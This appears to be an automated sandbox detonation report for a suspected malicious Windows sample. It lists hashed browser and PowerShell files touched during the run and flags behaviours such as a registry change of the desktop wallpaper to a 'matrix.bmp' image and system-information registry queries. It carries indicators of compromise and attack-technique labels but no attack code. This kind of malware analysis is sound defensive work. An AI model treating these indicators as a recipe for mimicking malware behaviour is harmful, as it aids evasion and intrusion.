memory/5344-1017-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1016-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1015-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1027-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1026-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1025-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1024-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1023-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1022-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
memory/5344-1021-0x000001E7B4A20000-0x000001E7B4A21000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b01e53044c1b0fdd1a454c6d6304819e |
| SHA1 | b0cc9008f600255f51a126dbab6565d568b7824f |
| SHA256 | 8e478339a15a35a9990a3a2b68121e35ac9672218c74fd77f37c0089cd43e3e4 |
| SHA512 | ec1630e5dfbe2b8feef7abd0a4ebb3ec02ae450c1b9a9c649c620aafc7e91c6ef591eba1e3e7a97cd57a7e30e44e55022de9ddc3212bb8738ef46fee134b8120 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | feb25d0151b98fc146e42a92c4a537d6 |
| SHA1 | 7451a4b20e33bb5bceee39be997382be23790c0b |
| SHA256 | f66b66f9279c8cd0f96ad664d3defe5cd93147ed61d3bf2586915785ec9036fd |
| SHA512 | 71cdd83058dc580f86bfa190e79e133b0d0eb67635f21a7daf71269418b442e73a6684b8a02bab495e4e91c427ef8804a7688711d418a57b62587406d2d208ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a022d30ed4d8b87e58aa92e4652ee638 |
| SHA1 | 3423a5ed20669bec36d20b472410b0061cea941c |
| SHA256 | 2ba22e1192431494026626f88951fc98100c4ff561746134b82b69ed1981454a |
| SHA512 | 25d329b27d26b546ab39218369237475fbed65c37c348216b144ed2d7f7a6280c6acd326c560345cda22a3fe83bb183c9080ff592b91e039c582f6cc946b4a26 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5808b5.TMP
| MD5 | 33fc327427c952d608f625b992c9958b |
| SHA1 | 3a59991897e0693be3c14285a77b97a413067616 |
| SHA256 | 3c60e60011d9b3eb200784b7e0bba37da3a7519326261ac7d92da9eac73928f7 |
| SHA512 | d98267fbb69511a94f4285c3d49745a4ea6cd264934501f1c45b05f510fb0e65abd70d90d3d79bf0038a9ac4ea682e9c39132e6033b5436f5e881d49514849b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e3e7dddc4837e1b811b4447f71df51c9 |
| SHA1 | ce3c479dc8dee85a98b6bf6450ba01ce03ca888a |
| SHA256 | e2cfc3fdaa2c4f827d3a1ecb40cd55485fa23ed1b90549fdba37affbf7bc31bc |
| SHA512 | d79b1a0dae17af37967fc9af7e69ebfdc72d430db8153f56bc2c6aa92638f5644b37eaa6da345f805a619d30c447addaeef035afc3968e8d8bd26495f0517b35 |
memory/4360-1166-0x00000145A5640000-0x00000145A5662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4moayzq.egd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75bfef5f222eb8e57b4fc25d599a9b73 |
| SHA1 | f11e28791ad3ae64a67477363f63b91bb9cdd7a4 |
| SHA256 | ca02b53396df5810f5d667890181e7d4e434933212c71dd6acf1972f4fba07c6 |
| SHA512 | 7e1ab752cf52c1284168e2627fd949bb2b49f6fe9f5ea8222373ce6e6b4bdae58116db4e5e7d61ca4f8234f19f9e015a02dcb88c93fb2770efbcd58a65064d41 |
memory/3968-1189-0x00000184CBAD0000-0x00000184CBC46000-memory.dmp
memory/3968-1190-0x00000184CBE60000-0x00000184CC06A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3bca8411b45106afaa963d562c371631 |
| SHA1 | 78857d33a65e7061ca18a3540c304f01e7e85325 |
| SHA256 | 4503345ee70aa9ca0f90012b665743d7c13ec7052e7a943222287973b752b9c7 |
| SHA512 | a6a7e9af6613a30730a0b87be76f87144a3483afb756445d462de7b22543027e5e8f5822e0337ba2d7b65e413e526da962783d05d226c0d13d113d57d28b56ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe585abd.TMP
| MD5 | 22ed3cc04fcc2e66b81335c4395971fd |
| SHA1 | 12ef48d70ec6f360644d2573dde99756f6ac05fb |
| SHA256 | 27bffcff6642dfcb87ac33eea61059552bc35ccd3c0d9f4da550398351836df9 |
| SHA512 | 9219928d246a8aa761ee289b0baacc7214b028976b1b890c7f1df38ecac61cb3a90e8af1b3861929155d07af304d58ae8f7304466769669a7cd40c55ae61cf40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | cf1f6be125da502d7e2ee8ebf5c5695f |
| SHA1 | 55edf4d375c1a884cb265a006f5777234dc501c4 |
| SHA256 | be8c14459aac4e4b1fe27ad3a7790c93b84063d1e3bc2677ed4088ac512ef9e8 |
| SHA512 | 41c51e104325fd93628e5862450bbdcab7a3861cae43000adb333ccdaabd74645f46c877f55f9e42a33ca15332baa1590ad853da22e5927b93dee5af2acdd38f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe585b3a.TMP
| MD5 | a8e7be4bc99956a1e3a02cf0ee2ca69b |
| SHA1 | bb29c01101603026dd100fb3b735e72d74dc6b3a |
| SHA256 | 3e06445cba28a88d04865d0344dd40b5a5a9deefc3c3fbbc5a7bffddc220ffc9 |
| SHA512 | 6859dfebc007c9c019c0d6c8ad81472e2110cd06cdd0cf823d66d2d26e64387bfa51f499a5c9a4066fa5e8e96f2a57e25b93b3ac3411525e5a42d1e0a45022d5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 0248afcc4c8e8cc727652e361d024764 |
| SHA1 | 939a03c0f9b8d508b6ec78494d2eb3ed8457e1a4 |
| SHA256 | 7a6cd84fc4c6a87c01f890d9a53ff7f7fa9353ee6eec49067acd82c4386b440e |
| SHA512 | f927ca1058c264c5ebbb88f18ca6d79f1b7c19f047fe33eca4e82fe87ab343f0514ab84e4a8fc0cd56df6a4b23d48fe0e1f5072d77d00b063d17dbbc6b1af44b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-ServerMode
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 042ab36124775619b7e5f81190139b97 |
| SHA1 | 94a4e0720cbc834667775a6776f0be97bed70783 |
| SHA256 | 527f3b40601503472cc1586bca68296a68644924e6614bf9418b50f0d7409740 |
| SHA512 | bb88e4bd95c2ba14243a0839167a2a1fba733af8ae424d287d4643bc188b707e5b4f7b3b3506d9311ef26949191ffb9cd66dbe39b91439f82628b33cfd0139f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | f070db5a804f373aa9d6f1236ec3cbc1 |
| SHA1 | d2813838dee70f980e7620d81fa46473fb1dc081 |
| SHA256 | 6933e83e6c3d4c0d9f8005173241c52a40464762d77227819ab3d55ca19cab9a |
| SHA512 | 3bb5010145bbf45c64b7ebdf4e1f518d81635a2a4ca150755621e0ecd536495576b9541da6ccbe72bb12043164503040430baceca402403b2ec209fecc0d3671 |
memory/3800-1943-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1942-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1941-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1950-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1949-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1948-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1947-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1946-0x00000288B9280000-0x00000288B9281000-memory.dmp
memory/3800-1945-0x00000288B9280000-0x00000288B9281000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d20dfd0608a0a5b5253f683a9e44d2f3 |
| SHA1 | 2b73357881a7f97b076d2cf63810ccb16302e945 |
| SHA256 | 92656c4743c714ac9ac46a6f08007b125bdd555ef966786765275767fa808789 |
| SHA512 | 6660e02248cc641fa0806d6f3680ea0d1d70e3f3c29d195b4b7b7fadbe343f3398337c76f5b3402b6e33d972c199c5211f6ebf67fd6828cddc48cd21d2813868 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 0df6cbc19df40a0361d51146d37fc327 |
| SHA1 | 49bb54f43b138f6f0af5d070f09b64e89ef4e59e |
| SHA256 | 3cd2bef32e1919e9d1767ad1180f73848c928b0ce8345186fbcbdd09ba3bbef1 |
| SHA512 | 7b2f947248025586cb080ff29dca8ce9fd66a058e0a4d0164df148aaffe411f9082f03f69ee9c31558f283830705e3d3e27a27eb7cc0d646fecf40c10fc47d00 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5948d7.TMP
| MD5 | 27248b7dc5b56e5d017b565beb089018 |
| SHA1 | e95d840988bef195b74099cc645119471c85b73c |
| SHA256 | 5eec9b9ed18b57b102dda84e3f124d71e560839999c70b5279718c517e0838bb |
| SHA512 | fb3ac4a407e9ecbaaf838e00b207282fb6a4d0cf9aa10f725b871b5389e2cd7a275bc62cf373cb9fa5e95488e74fc41d9e9070e44d9e05306e4c98f2d917d959 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6af8692b49678d7f8652cc01c9702070 |
| SHA1 | 96d02f15b82333f6b2a72eac9a9f1b9be86e9994 |
| SHA256 | 7b5f397f0bc0814e165fb0387b28d462a4564136404b4d09329baa1e576e7b65 |
| SHA512 | b5b7d0622d91f6eff7daa9eb2f44bc788a6fd17aa20678ed06e1a4d16be6e645c26397dd380c4116e6adbe59a7b3bff0c7b70ec057695c3b3639163245bfb783 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | c0f738fac7f7f4abd16f730c578332f5 |
| SHA1 | 9246cfaea53d76cdec1ae191ebff9bef4c6d3812 |
| SHA256 | 0eebff33d23429faeb502b782cee9443f9273e010ce2a2765bec12a057487337 |
| SHA512 | c3030c7c9ac047334ec379aacbe2fe70db0db625ef6b0026317ef819434c28005b5261c0f1e1a84d8e2754a69e84f052f8dd727a4c2d57b5fe3fabd18c63d913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | b6eced7e034751b1d9b777fe035d709e |
| SHA1 | 3c2c6fba247c46bf791b77fd65ef969c6e53bb17 |
| SHA256 | 1ab911b7a216519871cb3d29e0c2095093c327d02d877651901465b5e1e1d1bb |
| SHA512 | 3ee4d93dbda0f4dec85a47fccc3bd151f4a412e217bd02476da2600ea220d95e318cd28171067142b307529215e21a326765072ca721ab1d9de23f50c660ae90 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 20d851a3b613ebaa25df9c0fe3de3221 |
| SHA1 | 950a764ec6f5e3b44a3bcb69cb2b87411f6090f8 |
| SHA256 | 380a1c4ddc2892bf5c70ed4a30377e6a809d47270646cc01e31165a821858b67 |
| SHA512 | 4cfd4d22955fc10b93ff8393c389f0bcd0530194f04e42e9f50de0e962db0b7ac01c919b6780f59e73562e7c11fa9227f245778f33141eb0b4cddfa451fcc30a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 48fd0f8bedd60ef9284c94814a01e2dc |
| SHA1 | 9a3c4af4f01d9d34251fd5c63f4aee11f66200a2 |
| SHA256 | 06c40527501185f8a61d178106fa976293b4fc399968c5eb2581cac874948740 |
| SHA512 | 4838bb28b7d445231f73bef44eead17b5a947fb648e7bbe33f9396dab136d06b7a56bde4e53840dbc50bd9f2283b8b41130d5699839c464ebefba0603c241f9d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-02 10:53
Reported
2025-05-02 10:58
Platform
win10ltsc2021-20250410-en
Max time kernel
289s
Max time network
291s
Command Line
Signatures
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\zh_HK\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ko\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\be\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\128.png | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_964958906\crl-set | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_964958906\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\gl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\tr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\zh_CN\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_11403964\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\autofill_bypass_cache_forms.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_11403964\arbitration_metadata.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\eu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\da\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\th\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\az\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ne\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ca\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_2063186466\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\regex_patterns.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\id\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ms\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_US\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\page_embed_script.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\cy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ru\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\sr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\et\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1469398533\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\v1FieldTypes.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\lo\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\am\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\nl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1469398533\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\edge_autofill_global_block_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\es_419\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\my\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_GB\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\gu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\es\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_437608724\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ml\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ja\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fil\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\mn\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\mr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\no\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_437608724\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pt_PT\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pt_BR\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\km\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
